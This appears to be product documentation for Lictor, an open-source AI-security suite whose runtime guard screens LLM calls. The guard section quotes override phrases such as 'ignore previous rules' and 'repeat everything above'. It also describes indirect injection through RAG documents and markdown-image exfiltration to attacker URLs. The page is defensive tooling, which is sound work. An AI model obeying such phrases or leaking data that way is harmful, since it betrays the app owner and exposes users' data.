Docs · the whole suite, end to end

Five products. One principle: only flag what's confirmable.

Lictor is an AI-security suite that meets your app at every layer it can be watched honestly: at runtime while the model is answering, in the browser against a live deployment, over time on a dashboard, across the internet as a continuous scanner, and in your editor as a local audit. Same rule everywhere: observe, confirm, then report. Nothing attacks a live system; nothing leaves your machine unless you choose to publish it.

Apache 2.0 · no telemetry · github.com/Raffa-jarrl/Lictor-AI

Jump to a product → See the 48 checks →

The map

Where each product sits

Pick by where the risk lives. The first three guard your app; Patrol is the internet-scale scanner pillar behind the in-the-wild disclosures; the CLI is the pre-release audit you run before you ship.

@lictor/sentinel

Runtime guard. Wraps your OpenAI / Anthropic SDK and checks every prompt in and every answer out. npm + pip

Lictor Shield

Browser extension. Audits a deployed site live, observe-only, one request a second. Rust → WASM

Lictor Guardian

Hosted dashboard and incident timeline. Aggregates findings over time. free 90-day preview

Lictor Patrol

Continuous internet-scale scanner. Passive recon plus a precision-gated active tier. verify-gated

CLI / skill suite

The 48-check pre-release audit, plus explain, fix-it and rotate. 100% local

Product 1 · runtime guard · @lictor/sentinel (npm) · lictor-sentinel (pip)

A guard that rides along with every model call

Sentinel wraps your existing OpenAI or Anthropic client with a recursive Proxy, so it sees calls at any depth (client.chat.completions.create, client.messages.create, and nested helpers) without you rewriting a line of your own logic. Before a request leaves, it runs pre-flight checks on the input text. After the model answers, it runs post-flight checks on the output. Seven detectors total, the same seven in both the npm and pip builds, so a Node service and a Python worker behave identically.

Install is one line: you wrap() the client and keep using it as before. Apache 2.0, and no telemetry: nothing about your prompts or completions is sent anywhere.

Pre-flight detectors · run on the input

PRE-FLIGHT

prompt-injection

Catches a user trying to override your instructions ("ignore previous rules", role-swap, jailbreak framing) before it reaches the model.

PRE-FLIGHT

indirect-prompt-injection

The same attack hidden inside content your app pulled in (a RAG document, a fetched page, an email) carrying instructions into the prompt second-hand.

PRE-FLIGHT

secrets-in-input

Flags an API key, token or credential that's about to be shipped off to the model provider in the prompt, a leak you'd never see in your logs.

Post-flight detectors · run on the output

POST-FLIGHT

pii-leak

Catches the model handing back personal data (emails, phone numbers, IDs) in an answer that shouldn't contain it.

POST-FLIGHT

system-prompt-leak

Catches the model reciting your system prompt back to the user: the classic "repeat everything above" exfiltration.

POST-FLIGHT

output-exfil-sink

Catches model output that's trying to smuggle data out: a markdown image or link pointed at an attacker URL with your data in the query string.

OPT-IN

slopsquat-watch

Informational only. Notices when the model suggests a package name that doesn't exist, the seed of a slopsquatting attack. Off the blocking path by default; it never blocks unless you ask it to.

Install · one line, then nothing changes

# Node, npm
npm install @lictor/sentinel

// then wrap your client once
import OpenAI from "openai";
import { wrap } from "@lictor/sentinel";

const client = wrap(new OpenAI());
// use `client` exactly as before; pre/post-flight checks run on every call
# Python, pip
pip install lictor-sentinel

# then wrap your client once
from anthropic import Anthropic
from lictor_sentinel import wrap

client = wrap(Anthropic())
# use `client` exactly as before; same 7 detectors as the npm build

Want to see what each detector maps to in the standards? The prompt-injection, output-handling and exfiltration detectors line up with the OWASP Top 10 for LLM apps in the coverage map.

Product 2 · browser extension · Lictor Shield

Audit the site you're actually looking at

Shield runs 10 checks against a deployed site: the real thing on the real domain, not your source tree. It is observe-only: it reads what the browser already has and makes a small number of plain requests, single-lane at one request per second per host, always with credentials: omit so it never rides your logged-in session. The pattern-matching is done by a Rust core compiled to WASM, so the heavy scanning happens locally in the page, fast, with no server round-trip.

The 10 live checks

CRITICAL

Secrets in HTML & JS

Key-shaped strings the live page ships in its markup or bundled scripts.

HIGH

AI-agent fingerprint

Detects when the site is fronted by an AI agent or assistant, the surface our runtime detectors guard.

CRITICAL

Exposed .env / .git

Config and version-control directories the deployment accidentally serves.

CRITICAL

Supabase / Firebase open

A backend reachable from the page with no security rules in front of it.

HIGH

Unauth API paths

API endpoints the front-end calls that answer without a login check.

HIGH

Admin paths

Admin or dashboard surfaces left reachable on the public deployment.

HIGH

CORS

Cross-origin settings permissive enough to let another site read responses.

MEDIUM

Security headers

Missing CSP / HSTS / nosniff and the headers a framework leaves off.

MEDIUM

Mixed content

HTTPS pages pulling assets over plain HTTP, a downgrade and tamper risk.

MEDIUM

Exposed source maps

Published .map files that hand an attacker your original source.

Shield holds itself to the same evidence bar as the audit. See the false positives we filter for why a bare 200 OK is never enough to call something exposed.

Product 3 · hosted dashboard · Lictor Guardian

The findings, gathered over time

Sentinel and Shield each tell you about a moment. Guardian is the place those moments add up. It's a hosted dashboard and incident timeline that aggregates findings over time, so you can see whether a problem is new, recurring, or finally resolved, and tell that story to the people who ask. Free as a 90-day preview.

Incident timeline

Findings laid out in order: when each first appeared, when it changed, when it cleared.

Aggregated over time

One view across runs and sources, so a recurring issue reads as a pattern, not a surprise.

Free 90-day preview

Try the whole timeline for 90 days at no cost while the dashboard is in preview.

Product 4 · continuous scanner pillar · Lictor Patrol

The engine behind the in-the-wild disclosures

Patrol is the internet-scale scanner pillar. It starts with passive recon (what's already public, gathered without touching the target) and adds a precision-gated active tier that confirms a narrow set of high-signal exposures. Every finding, passive or active, passes through a central verify gate before it is ever reported. Until a human confirms it, a finding is SUSPECTED, never asserted. Disclosure is ethical and observe-only: Patrol looks, it does not break in.

The precision-gated active tier

These are the exposures the active tier confirms: each one observable from the outside, none requiring an attack.

CRITICAL

Exposed configs

Config files a deployment serves to the open internet.

CRITICAL

Open buckets

World-readable object storage with contents anyone can list.

HIGH

CORS

Cross-origin policies loose enough to leak authenticated responses.

HIGH

Subdomain takeovers

Dangling DNS pointed at a service that can be claimed.

CRITICAL

Leaked keys

Live credentials exposed in public surfaces, confirmed before report.

VERIFY GATE

SUSPECTED until verified

Nothing is reported as fact until a human clears the central verify gate.

The verify gate exists for the same reason as the audit's guards. See how Patrol decides "reachable" is not "exploitable".

Product 5 · local audit · the CLI / skill suite

The pre-release audit, in your editor

Four slash commands, all 100% local: no token, no signup, no telemetry. They read your code and explain what they find in plain English. The headline command is the 48-check audit documented in full on the coverage page.

/lictor-security-check

The 48-check pre-release audit. Detects the stack, runs every applicable check, writes a plain-English SECURITY-AUDIT.md.

/lictor-explain

Takes any finding or jargon-heavy warning and rewrites it as something a non-technical founder can act on.

/lictor-fix-it

Walks the findings one at a time, shows the proposed change, and applies it only with your explicit OK.

/lictor-rotate

Step-by-step, provider-specific rotation of a leaked key: the exact URL, the exact button, and how to confirm it worked.

Usage

# run the full 48-check audit on the current project
/lictor-security-check

# confused by a finding? get it in plain English
/lictor-explain

# apply the fixes, one at a time, with your approval
/lictor-fix-it

# a key leaked? rotate it, provider by provider
/lictor-rotate

Full check list with OWASP / CWE mappings: the 48 checks →

Honest boundaries

One rule across all five

Every product only reports what it can confirm by reading code or observing what's already public, never by attacking a live system. Sentinel guards calls without touching your prompts' contents off-box; Shield stays single-lane and credential-less; Patrol holds findings at SUSPECTED until a human verifies them; the CLI runs entirely on your machine. A scanner that cries wolf is worse than none, so the same evidence bar runs through all of it. Here are the false positives we filter.

Open-source. Apache 2.0. No telemetry.

Read the code before you trust it, install only the pieces you need, and run the audit on your own machine. Start with the 48-check audit, or wrap your model client today.

See the 48 checks → Install the CLI →